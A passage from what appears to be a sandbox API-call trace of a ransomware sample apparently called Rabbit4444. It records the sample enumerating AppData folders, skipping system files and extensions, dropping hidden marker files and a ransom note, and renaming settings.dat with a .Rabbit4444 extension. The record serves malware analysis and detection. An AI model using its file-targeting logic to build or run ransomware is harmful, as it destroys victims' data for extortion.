ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0066.554] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.554] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.554] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.554] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.554] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74b12964, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b12964, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0fd4afa, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.554] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.554] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.554] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.554] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.554] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.554] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0fd4afa, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0fd4afa, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0fd4afa, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.554] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.554] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.554] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0fd4afa, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0fd4afa, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0fd4afa, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.554] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0066.554] lstrcpyW (in: lpString1=0x130ec14, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.554] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\SystemAppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkcaptiveportal_cw5n1h2txyewy\\systemappdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.555] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.555] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.555] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.555] CloseHandle (hObject=0x27c) returned 1 [0066.555] CloseHandle (hObject=0x228) returned 1 [0066.555] GetCurrentThreadId () returned 0xd98 [0066.555] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122228 [0066.555] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\Settings", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\Settings" [0066.555] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11b6c8 | out: hHeap=0xe0000) returned 1 [0066.556] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122220 | out: hHeap=0xe0000) returned 1 [0066.556] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\Settings" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\Settings" [0066.556] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\Settings", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\Settings\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\Settings\\" [0066.556] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\Settings\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3" [0066.556] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkcaptiveportal_cw5n1h2txyewy\\settings\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.557] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.560] FlushFileBuffers (hFile=0x228) returned 1 [0066.561] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.561] CloseHandle (hObject=0x228) returned 1 [0066.561] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\Settings") returned 104 [0066.561] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.561] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\Settings\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74b12964, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b12964, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0fd4afa, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0066.562] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.562] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.562] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.562] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.562] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74b12964, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b12964, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0fd4afa, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.562] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.562] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.562] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.562] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.562] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.562] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0fd4afa, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0fd4afa, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0ffb3cd, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.562] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.562] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.562] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74b12964, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b12964, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x74b12964, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0066.562] lstrcmpiW (lpString1="roaming.lock", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.562] lstrcmpiW (lpString1="roaming.lock", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.562] lstrcmpiW (lpString1="roaming.lock", lpString2="Rabbit4444.exe") returned 1 [0066.562] lstrcmpiW (lpString1="roaming.lock", lpString2=".") returned 1 [0066.562] lstrcmpiW (lpString1="roaming.lock", lpString2="..") returned 1 [0066.562] lstrcmpiW (lpString1="roaming.lock", lpString2="windows") returned -1 [0066.562] lstrcmpiW (lpString1="roaming.lock", lpString2="bootmgr") returned 1 [0066.562] lstrcmpiW (lpString1="roaming.lock", lpString2="pagefile.sys") returned 1 [0066.562] lstrcmpiW (lpString1="roaming.lock", lpString2="boot") returned 1 [0066.562] lstrcmpiW (lpString1="roaming.lock", lpString2="ids.txt") returned 1 [0066.562] lstrcmpiW (lpString1="roaming.lock", lpString2="NTUSER.DAT") returned 1 [0066.562] lstrcpyW (in: lpString1=0x130ec0a, lpString2="roaming.lock" | out: lpString1="roaming.lock") returned="roaming.lock" [0066.562] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\Settings\\roaming.lock", dwFileAttributes=0x0) returned 1 [0066.563] lstrlenW (lpString="roaming.lock") returned 12 [0066.563] lstrlenW (lpString="Rabbit4444") returned 10 [0066.563] lstrcmpiW (lpString1="aming.lock", lpString2="Rabbit4444") returned -1 [0066.563] lstrlenW (lpString=".dll") returned 4 [0066.563] lstrcmpiW (lpString1="lock", lpString2=".dll") returned 1 [0066.563] lstrlenW (lpString=".lnk") returned 4 [0066.563] lstrcmpiW (lpString1="lock", lpString2=".lnk") returned 1 [0066.563] lstrlenW (lpString=".ini") returned 4 [0066.563] lstrcmpiW (lpString1="lock", lpString2=".ini") returned 1 [0066.563] lstrlenW (lpString=".sys") returned 4 [0066.563] lstrcmpiW (lpString1="lock", lpString2=".sys") returned 1 [0066.563] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74b12964, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b12964, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x55d5013a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0066.563] lstrcmpiW (lpString1="settings.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.563] lstrcmpiW (lpString1="settings.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.563] lstrcmpiW (lpString1="settings.dat", lpString2="Rabbit4444.exe") returned 1 [0066.563] lstrcmpiW (lpString1="settings.dat", lpString2=".") returned 1 [0066.563] lstrcmpiW (lpString1="settings.dat", lpString2="..") returned 1 [0066.563] lstrcmpiW (lpString1="settings.dat", lpString2="windows") returned -1 [0066.563] lstrcmpiW (lpString1="settings.dat", lpString2="bootmgr") returned 1 [0066.564] lstrcmpiW (lpString1="settings.dat", lpString2="pagefile.sys") returned 1 [0066.564] lstrcmpiW (lpString1="settings.dat", lpString2="boot") returned 1 [0066.564] lstrcmpiW (lpString1="settings.dat", lpString2="ids.txt") returned 1 [0066.564] lstrcmpiW (lpString1="settings.dat", lpString2="NTUSER.DAT") returned 1 [0066.564] lstrcpyW (in: lpString1=0x130ec0a, lpString2="settings.dat" | out: lpString1="settings.dat") returned="settings.dat" [0066.564] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\Settings\\settings.dat", dwFileAttributes=0x0) returned 1 [0066.564] lstrlenW (lpString="settings.dat") returned 12 [0066.564] lstrlenW (lpString="Rabbit4444") returned 10 [0066.564] lstrcmpiW (lpString1="ttings.dat", lpString2="Rabbit4444") returned 1 [0066.564] lstrlenW (lpString=".dll") returned 4 [0066.564] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0066.564] lstrlenW (lpString=".lnk") returned 4 [0066.564] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0066.564] lstrlenW (lpString=".ini") returned 4 [0066.564] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0066.564] lstrlenW (lpString=".sys") returned 4 [0066.564] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0066.564] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkcaptiveportal_cw5n1h2txyewy\\settings\\settings.dat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0066.565] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0066.565] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15787540189) returned 1 [0066.565] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0066.565] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0066.565] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0066.565] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x260 [0066.566] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0066.568] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0066.568] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0066.568] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0066.568] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0066.568] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0066.568] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0066.568] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0066.568] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0066.568] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15787914329) returned 1 [0066.568] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0066.568] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0066.569] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.569] CloseHandle (hObject=0x260) returned 1 [0066.569] CloseHandle (hObject=0x27c) returned 1 [0066.569] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\Settings\\settings.dat.Rabbit4444") returned 128 [0066.569] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkcaptiveportal_cw5n1h2txyewy\\settings\\settings.dat"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\Settings\\settings.dat.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkcaptiveportal_cw5n1h2txyewy\\settings\\settings.dat.rabbit4444"), dwFlags=0x1) returned 1 [0066.571] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74b12964, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b12964, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x55d5013a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 0 [0066.571] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0066.571] lstrcpyW (in: lpString1=0x130ec0a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.571] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\Settings\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkcaptiveportal_cw5n1h2txyewy\\settings\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.572] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.572] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.573] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.573] CloseHandle (hObject=0x27c) returned 1 [0066.573] CloseHandle (hObject=0x228) returned 1 [0066.573] GetCurrentThreadId () returned 0xd98 [0066.573] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122248 [0066.573] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\RoamingState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\RoamingState" [0066.573] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x125910 | out: hHeap=0xe0000) returned 1 [0066.573] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122240 | out: hHeap=0xe0000) returned 1 [0066.573] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\RoamingState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\RoamingState" [0066.573] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\RoamingState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\RoamingState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\RoamingState\\" [0066.574] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\RoamingState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3" [0066.574] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkcaptiveportal_cw5n1h2txyewy\\roamingstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.577] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.579] FlushFileBuffers (hFile=0x228) returned 1 [0066.580] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.581] CloseHandle (hObject=0x228) returned 1 [0066.581] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\RoamingState") returned 108 [0066.581] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.581] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\RoamingState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74b12964, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b12964, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf102262b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0066.581] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.581] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.581] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.581] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.581] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74b12964, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b12964, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf102262b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.581] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.581] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.581] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.582] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.582] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.582] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: 